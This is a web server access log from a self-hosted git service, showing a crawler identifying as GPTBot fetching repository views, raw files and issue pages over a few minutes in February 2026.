"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32926] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32927] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26362] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11147] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:18:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:18:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec?display=source" [Client 74.7.227.38] [Length 12307] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:18:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:18:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14913] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:18:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:09:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9839] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:18:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 